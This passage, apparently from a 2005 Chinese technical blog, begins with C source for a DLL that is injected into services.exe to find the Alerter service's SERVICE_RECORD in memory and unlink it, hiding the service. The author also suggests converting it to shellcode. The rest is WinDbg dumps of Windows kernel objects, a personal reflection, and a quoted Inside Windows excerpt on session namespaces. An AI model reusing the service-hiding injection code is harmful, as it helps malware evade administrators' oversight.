    DWORD                   UseCount;       // How many open handles to service
    DWORD                   StatusFlag;     // status(delete,update…)
    union {
        LPIMAGE_RECORD      ImageRecord;    // Points to image record
        LPWSTR              ObjectName;     // Points to driver object name
    };
    SERVICE_STATUS          ServiceStatus;  // see winsvc.h
    DWORD                   StartType;      // AUTO, DEMAND, etc.
    DWORD                   ErrorControl;   // NORMAL, SEVERE, etc.
    DWORD                   Tag;            // DWORD Id for the service,0=none.
    LPDEPEND_RECORD         StartDepend;
    LPDEPEND_RECORD         StopDepend;
    LPWSTR                  Dependencies;
    PSECURITY_DESCRIPTOR    ServiceSd;
    DWORD                   StartError;
    DWORD                   StartState;
    LPLOAD_ORDER_GROUP      MemberOfGroup;
    LPLOAD_ORDER_GROUP      RegistryGroup;
} SERVICE_RECORD, *PSERVICE_RECORD, *LPSERVICE_RECORD;

不知道现在改变了多少。实现隐藏,就是在 services.exe 的进程空间里搜到要隐藏的服务名对应的字符串,比如 Alerter,找到后再找引用这个地址的地方,就是一个 _SERVICE_RECORD,对应的就是 LPWSTR ServiceName; // points to service name。为了确认下,可以把地址+4 后看是否指向另一个字符串 LPWSTR DisplayName; // points to display name,和要隐藏的服务的显示的名称做比较,如果是,就证明这个地方的确是个 _SERVICE_RECORD 结构,把这个结构从链上摘掉。所以只用到 _SERVICE_RECORD 的前 4 个成员,通过 softice 看,前 4 个没变化,所以弄出个替代的结构
// The prefix of SERVICE_RECORD that the DLL actually touches: four pointer-sized
// members at offsets 0, 4, 8 and 12 on 32-bit.
typedef struct _FAKE_SERVICE_RECORD {
    struct _FAKE_SERVICE_RECORD  *Prev;          // linked list
    struct _FAKE_SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    // points to display name (compared below)
} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;


程序在下面,做为一个 dll 注入到 services.exe 中。搜索的范围有点大,其实每次的位置都基本是固定的,在其他的版本上没试过。
可以弄成shellcode注入进去,省了个dll


//////////////////////////////seArchDLL.cpp///////////////////////
#include <stdio.h>
#include <windows.h>
#include <string.h>

// Prefix of the services.exe SERVICE_RECORD used by seArchDWORD: four
// pointer-sized members at offsets 0, 4, 8 and 12 on 32-bit. seArchDWORD locates
// the ServiceName member and derives the record start as that address - 8.
typedef struct _FAKE_SERVICE_RECORD {
    struct _FAKE_SERVICE_RECORD  *Prev;          // linked list
    struct _FAKE_SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    // points to display name (compared below)
} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;

// Second-pass scan: looks for a 4-byte value equal to Addr (see definition below).
void seArchDWORD(int Addr);
// DLL entry point. On DLL_PROCESS_ATTACH it scans the host process's address range
// [0×300000, 0×5000000) in 4-byte steps for the wide string "Alerter" (the `0×`
// reads as a mis-encoded `0x`), appends each hit to c:\seArch.txt and hands the
// address to seArchDWORD. Other reason codes do nothing. Returns TRUE always.
//
// NOTE(review): all of this runs inside DllMain (loader lock held) and does printf
// and file I/O on every probed address; the log file and the console output are
// the most visible artifacts this leaves behind.
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReAson,LPVOID lpvReserved)
{
 switch (fdwReAson){
  
 case DLL_PROCESS_ATTACH:
  {  
   FILE* pFile;
   pFile = fopen("c:\\seArch.txt","a+");   // return value not checked; NULL here would fault in fputs
   fputs("begin\n",pFile);
   fclose(pFile);
   int i;
   for (i = 0×300000;i<0×5000000;i+=4){
    printf("%x\n",i);   // one line per probed address
    __try{
     // wcscmp reads until a terminator; any exception (e.g. an access violation
     // on unmapped memory) lands in the __except below.
     if (0 == wcscmp((const unsigned short *)i,L"Alerter")){
      char temp [32];   // "found Alerter At: " + 8 hex digits + "\n" + NUL = 28 bytes
      sprintf(temp,"found Alerter At: %x\n",i);
      FILE* pFile;
      pFile = fopen("c:\\seArch.txt","a+");   // unchecked, as above
      fputs(temp,pFile);
      fclose(pFile);
      seArchDWORD(i);
      //break;   (commented out by the author: the scan continues after a hit)
     }
    }
    __except(EXCEPTION_EXECUTE_HANDLER ){
     printf("error\n");
     // Net of the loop's own i+=4, the next probe is 0×1000 bytes past the fault.
     i-=4;
     i += 0×1000;
     //_getche();
    }
   }


  }   // no break: falls through to DLL_THREAD_ATTACH, which only breaks
 case DLL_THREAD_ATTACH:
  break;
 case DLL_THREAD_DETACH:
  break;
 case DLL_PROCESS_DETACH:
  break;
 }
 return TRUE;
}
//——————————————————————–
// Second pass: scans the same range as DllMain for a 4-byte value equal to Addr
// (the address of the "Alerter" string found there), i.e. a pointer field that
// references that string. Every hit is logged to c:\seArch.txt together with the
// wide string pointed to by the DWORD at i+4. When that string is also "Alerter",
// the hit is treated as the ServiceName member of a FAKE_SERVICE_RECORD whose
// Prev/Next pointers sit at i-8 and i-4, and the record is unlinked from its
// doubly-linked list. No return value; exceptions are swallowed by the __except
// and the scan resumes 0×1000 bytes further on.
//
// NOTE(review): each unlink writes into another process's data structures with
// no locking; the log file plus the per-address printf are the visible traces.
void seArchDWORD(int Addr)
{
 int i;
 for (i = 0×300000;i<0×5000000;i+=4){   // `0×` reads as a mis-encoded `0x`
  printf("%x\n",i);
  __try{
   if (Addr == *(ULONG*)i){
    char temp [32];   // "found the point At: " + 8 hex digits + "\n" + NUL = 30 bytes
    sprintf(temp,"found the point At: %x\n",i);
    FILE* pFile;
    pFile = fopen("c:\\seArch.txt","a+");   // return value not checked
    fputs(temp,pFile);
    fputws((const unsigned short *)(*(ULONG*)(i+4)),pFile);   // the DisplayName slot (ServiceName + 4)
    fputs("\n",pFile);
    fclose(pFile);
    //break;
    if (0 == wcscmp((const unsigned short *)(*(ULONG*)(i+4)),L"Alerter")){
     //found the right one: ServiceName is at offset 8, so the record starts at i-8
     PFAKE_SERVICE_RECORD pRecord;
     pRecord = (PFAKE_SERVICE_RECORD)(i-8);
     *((DWORD*)pRecord->Prev+1) = (DWORD)(pRecord->Next);   // Prev->Next = Next
     *((DWORD*)pRecord->Next) = (DWORD)(pRecord->Prev);     // Next->Prev = Prev
     }
   }
  }
  __except(EXCEPTION_EXECUTE_HANDLER ){
   printf("error\n");
   i-=4;
   i += 0×1000;   // with the loop's i+=4, the next probe is 0×1000 past the fault
   //_getche();
  }
 }
 
}
//——————————————————————–

2005年09月15日

kd> !process 80d7a930-0x1b0
PROCESS 80d7a780  SessionId: 0  Cid: 0264    Peb: 7ffdf000  ParentCid: 0224
    DirBase: 06a33000  ObjectTable: e15edcf0  HandleCount:  20.
    Image: savedump.exe
    VadRoot 80dbfb98 Vads 40 Clone 0 Private 78. Modified 0. Locked 0.
    DeviceMap e10000d8
    Token                             e15dbd38
    ElapsedTime                       00:04:14.656
    UserTime                          00:00:00.015
    KernelTime                        00:00:00.109
    QuotaPoolUsage[PagedPool]         15352
    QuotaPoolUsage[NonPagedPool]      1600
    Working Set Sizes (now,min,max)  (372, 50, 345) (1488KB, 200KB, 1380KB)
    PeakWorkingSetSize                408
    VirtualSize                       12 Mb
    PeakVirtualSize                   15 Mb
    PageFaultCount                    440
    MemoryPriority                    BACKGROUND
    BasePriority                      4
    CommitCharge                      419

        THREAD 80d7a508  Cid 0264.0268  Teb: 7ffde000 Win32Thread: e15df2f8 WAIT: (DelayExecution) UserMode Non-Alertable
            80d7a5f8  NotificationTimer
        Not impersonating
        DeviceMap                 e10000d8
        Owning Process            80d7a780       Image:         savedump.exe
        Wait Start TickCount      17199          Ticks: 895 (0:00:00:13.984)
        Context Switch Count      58                 LargeStack
        UserTime                  00:00:00.0000
        KernelTime                00:00:00.0109
        Start Address 0x77e6149f
        Win32 Start Address 0x010040ed
        Stack Init f9f3b000 Current f9f3acbc Base f9f3b000 Limit f9f37000 Call 0
        Priority 2 BasePriority 2 PriorityDecrement 0 DecrementCount 16
        ChildEBP RetAddr 
        f9f3acd4 804ecd36 nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])
        f9f3ace0 804ed393 nt!KiSwapThread+0x44 (FPO: [0,0,2])
        f9f3ad0c 80581778 nt!KeDelayExecutionThread+0x1c7 (FPO: [Non-Fpo])
        f9f3ad54 804db140 nt!NtDelayExecution+0x87 (FPO: [Non-Fpo])
        f9f3ad54 7ffe0304 nt!KiSystemService+0xc4 (FPO: [0,0] TrapFrame @ f9f3ad64)
        0006eac8 00000000 SharedUserData!SystemCallStub+0x4 (FPO: [0,0,0])

2005年09月12日

回到学校的时候,听到喇叭里在讲故事,佛在问一个蜘蛛什么是最珍贵的,,只听到了这么一句.心里想佛又懂得什么,我也不懂得佛,,什么是最珍贵的,也许是失去的.佛失去了所有吗?谁由能比较出那个最珍贵的?该是最珍贵的就该是它,即使还没有失去,大概也没有谁为了证明其最珍贵而故意失去,那样的话也就谈不上珍贵了.也许是最难得到的,但总有未被得到的,那个最珍贵在被得到后又会是怎样的珍贵呢?如果人这一辈子只有精力去得到一样,就必须做出选择,在得到或得不到之前明白了哪个是最珍贵的.如果后悔了,永远也得不到最珍贵的了.每一个都很珍贵,我是说"每一个".你可以得到一块石头,但你无法得到每一块石头;你可以得到一片树叶,但你无法得到每一片树叶.不过人还是很幸运的,至少有机会懂得什么是得到.所以要选择那个唯一的,得到她,就得到了全部.因为这世界里只有这一个她,再没有比她自己更相象的了.如果存在生死轮回那一套,她就是还会出现的,在若干年后或着若干年前,并不会因为性格,相貌的改变而失去她的珍贵.如果说是注定的那个人,说好要永远照顾她,就无论在何时何地,若是相隔太久她忘记了,唤回过会或者将来的记忆.

嘿嘿,又乱发飙了,活的都不知道自己到底是个什么样的人了

2005年09月11日

进程是个object,它的Object body就是_EPROCESS,其他的也同样
kd> !process 4 0
Searching for Process with Cid == 4
PROCESS 80f10020  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00039000  ObjectTable: e1001d10  HandleCount: 186.
    Image: System

kd> dt _EPROCESS 80f10020
   +0×000 Pcb              : _KPROCESS
   +0×06c ProcessLock      : _EX_PUSH_LOCK
   +0×070 CreateTime       : _LARGE_INTEGER 0×0
   +0×078 ExitTime         : _LARGE_INTEGER 0×0
   +0×080 RundownProtect   : _EX_RUNDOWN_REF
   +0×084 UniqueProcessId  : 0×00000004
   +0×088 ActiveProcessLinks : _LIST_ENTRY [ 0x80daa350 - 0x8054ee78 ]
   +0×090 QuotaUsage       : [3] 0
   +0×09c QuotaPeak        : [3] 0
   +0×0a8 CommitCharge     : 7
   +0×0ac PeakVirtualSize  : 0×27b000
   +0×0b0 VirtualSize      : 0×1bf000
   +0×0b4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0×0bc DebugPort        : (null)
   +0×0c0 ExceptionPort    : (null)
   +0×0c4 ObjectTable      : 0xe1001d10
   +0×0c8 Token            : _EX_FAST_REF
   +0×0cc WorkingSetLock   : _FAST_MUTEX
   +0×0ec WorkingSetPage   : 0
   +0×0f0 AddressCreationLock : _FAST_MUTEX
   +0×110 HyperSpaceLock   : 0
   +0×114 ForkInProgress   : (null)
   +0×118 HardwareTrigger  : 0
   +0×11c VadRoot          : 0×80f0a5a0
   +0×120 VadHint          : 0xffb8e390
   +0×124 CloneRoot        : (null)
   +0×128 NumberOfPrivatePages : 3
   +0×12c NumberOfLockedPages : 0
   +0×130 Win32Process     : (null)
   +0×134 Job              : (null)
   +0×138 SectionObject    : (null)
   +0×13c SectionBaseAddress : (null)
   +0×140 QuotaBlock       : 0×8054ef20
   +0×144 WorkingSetWatch  : (null)
   +0×148 Win32WindowStation : (null)
   +0×14c InheritedFromUniqueProcessId : (null)
   +0×150 LdtInformation   : (null)
   +0×154 VadFreeHint      : (null)
   +0×158 VdmObjects       : (null)
   +0×15c DeviceMap        : 0xe10000d8
   +0×160 PhysicalVadList  : _LIST_ENTRY [ 0x80f10180 - 0x80f10180 ]
   +0×168 PageDirectoryPte : _HARDWARE_PTE_X86
   +0×168 Filler           : 0
   +0×170 Session          : (null)
   +0×174 ImageFileName    : [16]  "System"
   +0×184 JobLinks         : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0×18c LockedPagesList  : (null)
   +0×190 ThreadListHead   : _LIST_ENTRY [ 0x80f10fd4 - 0xffb21aec ]
   +0×198 SecurityPort     : 0xe162eef0
   +0×19c PaeTop           : (null)
   +0×1a0 ActiveThreads    : 0×31
   +0×1a4 GrantedAccess    : 0×1f0fff
   +0×1a8 DefaultHardErrorProcessing : 1
   +0×1ac LastThreadExitStatus : 0
   +0×1b0 Peb              : (null)
   +0×1b4 PrefetchTrace    : _EX_FAST_REF
   +0×1b8 ReadOperationCount : _LARGE_INTEGER 0×52
   +0×1c0 WriteOperationCount : _LARGE_INTEGER 0xc1
   +0×1c8 OtherOperationCount : _LARGE_INTEGER 0xb5a
   +0×1d0 ReadTransferCount : _LARGE_INTEGER 0×5b48a
   +0×1d8 WriteTransferCount : _LARGE_INTEGER 0×16c0d2
   +0×1e0 OtherTransferCount : _LARGE_INTEGER 0×43e9f
   +0×1e8 CommitChargeLimit : 0
   +0×1ec CommitChargePeak : 0×1c4
   +0×1f0 AweInfo          : (null)
   +0×1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
   +0×1f8 Vm               : _MMSUPPORT
   +0×238 LastFaultCount   : 0
   +0×23c ModifiedPageCount : 0×54e
   +0×240 NumberOfVads     : 4
   +0×244 JobStatus        : 0
   +0×248 Flags            : 0×40000
   +0×248 CreateReported   : 0y0
   +0×248 NoDebugInherit   : 0y0
   +0×248 ProcessExiting   : 0y0
   +0×248 ProcessDelete    : 0y0
   +0×248 Wow64SplitPages  : 0y0
   +0×248 VmDeleted        : 0y0
   +0×248 OutswapEnabled   : 0y0
   +0×248 Outswapped       : 0y0
   +0×248 ForkFailed       : 0y0
   +0×248 HasPhysicalVad   : 0y0
   +0×248 AddressSpaceInitialized : 0y00
   +0×248 SetTimerResolution : 0y0
   +0×248 BreakOnTermination : 0y0
   +0×248 SessionCreationUnderway : 0y0
   +0×248 WriteWatch       : 0y0
   +0×248 ProcessInSession : 0y0
   +0×248 OverrideAddressSpace : 0y0
   +0×248 HasAddressSpace  : 0y1
   +0×248 LaunchPrefetched : 0y0
   +0×248 InjectInpageErrors : 0y0
   +0×248 Unused           : 0y00000000000 (0)
   +0×24c ExitStatus       : 259
   +0×250 NextPageColor    : 0×3677
   +0×252 SubSystemMinorVersion : 0 ”
   +0×253 SubSystemMajorVersion : 0 ”
   +0×252 SubSystemVersion : 0
   +0×254 PriorityClass    : 0×2 ”
   +0×255 WorkingSetAcquiredUnsafe : 0 ”

kd> !object 80f10020
Object: 80f10020  Type: (80f446f8) Process
    ObjectHeader: 80f10008
    HandleCount: 2  PointerCount: 58

很清楚了

type也是一种object,
kd> dt _OBJECT_HEADER 80f10008
   +0×000 PointerCount     : 58
   +0×004 HandleCount      : 2
   +0×004 NextToFree       : 0×00000002
   +0×008 Type             : 0×80f446f8
   +0×00c NameInfoOffset   : 0 ”
   +0×00d HandleInfoOffset : 0 ”
   +0×00e QuotaInfoOffset  : 0 ”
   +0×00f Flags            : 0×22 ‘"’
   +0×010 ObjectCreateInfo : 0×8054ef20
   +0×010 QuotaBlockCharged : 0×8054ef20
   +0×014 SecurityDescriptor : 0xe1000714
   +0×018 Body             : _QUAD

kd> !object 0x80f446f8
Object: 80f446f8  Type: (80f44e70) Type
    ObjectHeader: 80f446e0
    HandleCount: 0  PointerCount: 1
    Directory Object: e1001510  Name: Process

还有类型为type的type :>

kd> dt _OBJECT_HEADER 80f446e0
   +0×000 PointerCount     : 1
   +0×004 HandleCount      : 0
   +0×004 NextToFree       : (null)
   +0×008 Type             : 0×80f44e70
   +0×00c NameInfoOffset   : 0×20 ‘ ‘
   +0×00d HandleInfoOffset : 0 ”
   +0×00e QuotaInfoOffset  : 0 ”
   +0×00f Flags            : 0×17 ”
   +0×010 ObjectCreateInfo : (null)
   +0×010 QuotaBlockCharged : (null)
   +0×014 SecurityDescriptor : (null)
   +0×018 Body             : _QUAD
kd> !object 0x80f44e70
Object: 80f44e70  Type: (80f44e70) Type
    ObjectHeader: 80f44e58
    HandleCount: 0  PointerCount: 1
    Directory Object: e1001510  Name: Type


不同type的object,包含的Method也不同

kd> !object 0x80f44e70
Object: 80f44e70  Type: (80f44e70) Type
    ObjectHeader: 80f44e58
    HandleCount: 0  PointerCount: 1
    Directory Object: e1001510  Name: Type
kd> dt _OBJECT_TYPE 0x80f44e70
   +0×000 Mutex            : _ERESOURCE
   +0×038 TypeList         : _LIST_ENTRY [ 0x80f44e48 - 0x80f3ee48 ]
   +0×040 Name             : _UNICODE_STRING "Type"
   +0×048 DefaultObject    : 0×8054e4e0
   +0×04c Index            : 1
   +0×050 TotalNumberOfObjects : 0×1d
   +0×054 TotalNumberOfHandles : 0
   +0×058 HighWaterNumberOfObjects : 0×1d
   +0×05c HighWaterNumberOfHandles : 0
   +0×060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0×0ac Key              : 0×546a624f
   +0×0b0 ObjectLocks      : [4] _ERESOURCE
kd> dt _OBJECT_TYPE_INITIALIZER 0x80f44e70+60
   +0×000 Length           : 0×4c
   +0×002 UseDefaultObject : 0×1 ”
   +0×003 CaseInsensitive  : 0 ”
   +0×004 InvalidAttributes : 0×100
   +0×008 GenericMapping   : _GENERIC_MAPPING
   +0×018 ValidAccessMask  : 0×1f0001
   +0×01c SecurityRequired : 0 ”
   +0×01d MaintainHandleCount : 0 ”
   +0×01e MaintainTypeList : 0×1 ”
   +0×020 PoolType         : 0 ( NonPagedPool )
   +0×024 DefaultPagedPoolCharge : 0
   +0×028 DefaultNonPagedPoolCharge : 0×1c0
   +0×02c DumpProcedure    : (null)
   +0×030 OpenProcedure    : (null)
   +0×034 CloseProcedure   : (null)
   +0×038 DeleteProcedure  : 0×8060d698     nt!ObpDeleteObjectType+0
   +0×03c ParseProcedure   : (null)
   +0×040 SecurityProcedure : 0×80586333     nt!SeDefaultObjectMethod+0
   +0×044 QueryNameProcedure : (null)
   +0×048 OkayToCloseProcedure : (null)
kd> dt _OBJECT_TYPE 0x80f446f8
   +0x000 Mutex            : _ERESOURCE
   +0x038 TypeList         : _LIST_ENTRY [ 0x80f44730 - 0x80f44730 ]
   +0x040 Name             : _UNICODE_STRING "Process"
   +0x048 DefaultObject    : (null)
   +0x04c Index            : 5
   +0x050 TotalNumberOfObjects : 0x11
   +0x054 TotalNumberOfHandles : 0x3c
   +0x058 HighWaterNumberOfObjects : 0x13
   +0x05c HighWaterNumberOfHandles : 0x40
   +0x060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x0ac Key              : 0x636f7250
   +0x0b0 ObjectLocks      : [4] _ERESOURCE
kd> dt _OBJECT_TYPE_INITIALIZER 0x80f446f8+60
   +0x000 Length           : 0x4c
   +0x002 UseDefaultObject : 0 ''
   +0x003 CaseInsensitive  : 0 ''
   +0x004 InvalidAttributes : 0xb0
   +0x008 GenericMapping   : _GENERIC_MAPPING
   +0x018 ValidAccessMask  : 0x1f0fff
   +0x01c SecurityRequired : 0x1 ''
   +0x01d MaintainHandleCount : 0 ''
   +0x01e MaintainTypeList : 0 ''
   +0x020 PoolType         : 0 ( NonPagedPool )
   +0x024 DefaultPagedPoolCharge : 0x1000
   +0x028 DefaultNonPagedPoolCharge : 0x288
   +0x02c DumpProcedure    : (null)
   +0x030 OpenProcedure    : (null)
   +0x034 CloseProcedure   : (null)
   +0x038 DeleteProcedure  : 0x805930f2     nt!PspProcessDelete+0
   +0x03c ParseProcedure   : (null)
   +0x040 SecurityProcedure : 0x80586333     nt!SeDefaultObjectMethod+0
   +0x044 QueryNameProcedure : (null)
   +0x048 OkayToCloseProcedure : (null)

object type里包含一些对这种object的操作

kernel handle table
kd> x /t/v nt!ObpKernelHandleTable
pub global 8054e558    0 <NoType> nt!ObpKernelHandleTable = <no type information>


在windows下建多个用户,然后在用快速用户切换的时候,SessionId会表示进程属于哪个session

kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS 80f10020  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00039000  ObjectTable: e1001d10  HandleCount: 191.
    Image: System

PROCESS 80daa2c8  SessionId: none  Cid: 016c    Peb: 7ffdf000  ParentCid: 0004
    DirBase: 05825000  ObjectTable: e12d9708  HandleCount:  26.
    Image: smss.exe

PROCESS 80dc1020  SessionId: 0  Cid: 01fc    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 061ee000  ObjectTable: e13b06c8  HandleCount: 327.
    Image: csrss.exe

PROCESS 80db0020  SessionId: 0  Cid: 0214    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 06573000  ObjectTable: e138b940  HandleCount: 452.
    Image: winlogon.exe

PROCESS 80d96240  SessionId: 0  Cid: 024c    Peb: 7ffdf000  ParentCid: 0214
    DirBase: 069e5000  ObjectTable: e15e2c10  HandleCount: 284.
    Image: services.exe

PROCESS 80db3a88  SessionId: 0  Cid: 0258    Peb: 7ffdf000  ParentCid: 0214
    DirBase: 06931000  ObjectTable: e15faeb8  HandleCount: 307.
    Image: lsass.exe

PROCESS ffba98d8  SessionId: 0  Cid: 0358    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 06f75000  ObjectTable: e13a16a0  HandleCount: 185.
    Image: svchost.exe

PROCESS ffba1278  SessionId: 0  Cid: 03ec    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 0703d000  ObjectTable: e16385a8  HandleCount: 997.
    Image: svchost.exe

PROCESS ffb8cb30  SessionId: 0  Cid: 048c    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 0891e000  ObjectTable: e157a520  HandleCount:  48.
    Image: svchost.exe

PROCESS ffb85570  SessionId: 0  Cid: 04ac    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 08ae5000  ObjectTable: e139f450  HandleCount: 133.
    Image: svchost.exe

PROCESS ffb6b3c0  SessionId: 0  Cid: 05bc    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 093b8000  ObjectTable: e186b078  HandleCount: 116.
    Image: spoolsv.exe

PROCESS ffb4fda8  SessionId: 0  Cid: 0678    Peb: 7ffdf000  ParentCid: 063c
    DirBase: 09c03000  ObjectTable: e17da8a8  HandleCount: 248.
    Image: explorer.exe

PROCESS ffb1dda8  SessionId: 0  Cid: 072c    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 09f49000  ObjectTable: e15a9af8  HandleCount:  42.
    Image: VMwareService.exe

PROCESS ffaf0020  SessionId: 0  Cid: 0308    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0aba3000  ObjectTable: e18c8060  HandleCount:  33.
    Image: VMwareTray.exe

PROCESS ffaed8d8  SessionId: 0  Cid: 0348    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0ae03000  ObjectTable: e15f6b88  HandleCount:  37.
    Image: VMwareUser.exe

PROCESS ffaeada8  SessionId: 0  Cid: 036c    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0af96000  ObjectTable: e17c0440  HandleCount:  62.
    Image: ctfmon.exe

PROCESS ffaa8da8  SessionId: 0  Cid: 06ec    Peb: 7ffdf000  ParentCid: 0678
    DirBase: 0c16d000  ObjectTable: e1a04b00  HandleCount:  21.
    Image: cmd.exe

PROCESS 80f26020  SessionId: 0  Cid: 06f4    Peb: 7ffdf000  ParentCid: 06ec
    DirBase: 0c28d000  ObjectTable: e179f6a8  HandleCount:  23.
    Image: conime.exe

PROCESS 80e92b30  SessionId: 1  Cid: 01c0    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 00cf8000  ObjectTable: e13ae918  HandleCount: 115.
    Image: csrss.exe

PROCESS 80e8b020  SessionId: 1  Cid: 04f0    Peb: 7ffdf000  ParentCid: 016c
    DirBase: 00e7f000  ObjectTable: e1822530  HandleCount: 212.
    Image: winlogon.exe

PROCESS 80e62020  SessionId: 1  Cid: 0780    Peb: 7ffdf000  ParentCid: 0574
    DirBase: 06ce0000  ObjectTable: e155cf00  HandleCount: 257.
    Image: explorer.exe

PROCESS ffa83c70  SessionId: 0  Cid: 0070    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 07a62000  ObjectTable: e17f7a78  HandleCount: 100.
    Image: msiexec.exe

PROCESS ffa56410  SessionId: 1  Cid: 019c    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 08d76000  ObjectTable: e1827ee0  HandleCount:  39.
    Image: imjpmig.exe

PROCESS ffa542a0  SessionId: 1  Cid: 018c    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 09067000  ObjectTable: e1ab51a8  HandleCount:  36.
    Image: VMwareTray.exe

PROCESS ffa424c0  SessionId: 1  Cid: 02c8    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 0c981000  ObjectTable: e15e20d8  HandleCount:  34.
    Image: VMwareUser.exe

PROCESS ffa4e4f8  SessionId: 1  Cid: 0200    Peb: 7ffdf000  ParentCid: 0780
    DirBase: 0c21f000  ObjectTable: e179ed70  HandleCount:  59.
    Image: ctfmon.exe

PROCESS ffa4ec10  SessionId: 0  Cid: 038c    Peb: 7ffdf000  ParentCid: 024c
    DirBase: 0767e000  ObjectTable: e1e633c0  HandleCount:  94.
    Image: imapi.exe

并且用winobj查看,Sessions目录下多出了个1,里面有DosDevices,Windows,BaseNamedObjects三个目录,是

从原来的复制过来的

Session Namespace (from Inside Windows, 4th edition)
Windows NT was originally written with the assumption that only one user would log on to the

system interactively and that the system would run only one instance of any interactive

application. The addition of Windows Terminal Services in Windows 2000 Server and fast user

switching in Windows XP changed these assumptions, thus requiring changes to the object

manager namespace model to support multiple users. (For a basic description of terminal

services and sessions, see Chapter 1.)

A user logged on to the console session has access to the global namespace, a namespace that

serves as the first instance of the namespace. Additional sessions are given a session-

private view of the namespace known as a local namespace. The parts of the namespace that

are localized for each session include \DosDevices, \Windows, and \BaseNamedObjects. Making

separate copies of the same parts of the namespace is known as instancing the namespace.

Instancing \DosDevices makes it possible for each user to have different network drive

letters and Windows objects such as serial ports. On Windows 2000, the global \DosDevices

directory is named \?? and is the directory to which the \DosDevices symbolic link points,

and local \DosDevices directories are identified by the session id for the terminal server

session. On Windows XP and later, the global \DosDevices directory is named \Global?? and is

the directory to which \DosDevices points, and local \DosDevices directories are identified

by the logon session ID.

The \Windows directory is where Win32k.sys creates the interactive window station, \WinSta0.

A Terminal Services environment can support multiple interactive users, but each user needs

an individual version of WinSta0 to preserve the illusion that he or she is accessing the

predefined interactive window station in Windows. Finally, applications and the system

create shared objects in \BaseNamedObjects, including events, mutexes, and memory sections.

If two users are running an application that creates a named object, each user session must

have a private version of the object so that the two instances of the application don’t

interfere with one another by accessing the same object.

The object manager implements a local namespace by creating the private versions of the

three directories mentioned under a directory associated with the user’s session under

\Sessions\X (where X is the session identifier). When a Windows application in remote

session two creates a named event, for example, the object manager transparently redirects

the object’s name from \BaseNamedObjects to \Sessions\2\BaseNamedObjects.

All object manager functions related to namespace management are aware of the instanced

directories and participate in providing the illusion that nonconsole sessions use the same

namespace as the console session. Windows subsystem DLLs prefix names passed by Windows

applications that reference objects in \DosDevices with \?? (for example, C:\Windows becomes

\??\C:\Windows). When the object manager sees the special \?? prefix, the steps it takes

depends on the version of Windows, but it always relies on a field named DeviceMap in the

executive process object (EPROCESS, which is described further in Chapter 6) that points to

a data structure shared by other processes in the same session. The DosDevicesDirectory

field of the DeviceMap structure points at the object manager directory that represents the

process’s local \DosDevices. The target directory varies depending on the system:

If the system is Windows 2000 and Terminal Services are not installed, the

DosDevicesDirectory field of the DeviceMap structure of the process points at the \??

directory because there are no local namespaces.

If the system is Windows 2000 and Terminal Services are installed, when a new session

becomes active the system copies all the objects from the global \?? directory into the

session’s local \Devices directory and the DosDevicesDirectory field of the DeviceMap

structure points at the local directory.

On Windows XP and Windows Server 2003, the system does not make copies of global objects in

the local DosDevices directories. When the object manager sees a reference to \??, it

locates the process’s local \DosDevices by using the DosDevicesDirectory field of the

DeviceMap. If the object manager doesn’t find the object in that directory, it checks the

DeviceMap field of the directory object, and if it’s valid it looks for the object in the

directory pointed to by the GlobalDosDevicesDirectory field of the DeviceMap structure,

which is always \Global??.

Under certain circumstances, applications that are Terminal Services–aware need to access

objects in the console session even if the application is running in a remote session. The

application might want to do this to synchronize with instances of itself running in other

remote sessions or with the console session. For these cases, the object manager provides

the special override "\Global" that an application can prefix to any object name to access

the global namespace. For example, an application in session two opening an object named

\Global\ApplicationInitialized is directed to \BasedNamedObjects\ApplicationInitialized

instead of \Sessions\2\BaseNamedObjects\ApplicationInitialized.

On Windows XP and Windows Server 2003, an application that wants to access an object in the

global \DosDevices directory does not need to use the \Global prefix as long as the object

doesn’t exist in its local \DosDevices directory. This is because the object manager will

automatically look in the global directory for the object if it doesn’t find it in the local

directory. However, an application running on Windows 2000 with Terminal Services must

always specify the \Global prefix to access objects in the global \DosDevices directory.

Table 3-8. Standard Object Directories

Directory

Types of Object Names Stored

\GLOBAL?? (\?? in Windows 2000)

MS-DOS device names (\DosDevices is a symbolic link to this directory.)

\BaseNamedObjects

Mutexes, events, semaphores, waitable timers, and section objects

\Callback

Callback objects

\Device

Device objects

\Driver

Driver objects

\FileSystem

File system driver objects and file system recognizer device objects

\KnownDlls

Section names and path for known DLLs (DLLs mapped by the system at startup time)

\Nls

Section names for mapped national language support tables

\ObjectTypes

Names of types of objects

\RPC Control

Port objects used by remote procedure calls (RPCs)

\Security

Names of objects specific to the security subsystem

\Windows

Windows subsystem ports and window stations


Table 3-3. Executive Objects Exposed to the Windows API

Object Type

Represents

Symbolic link

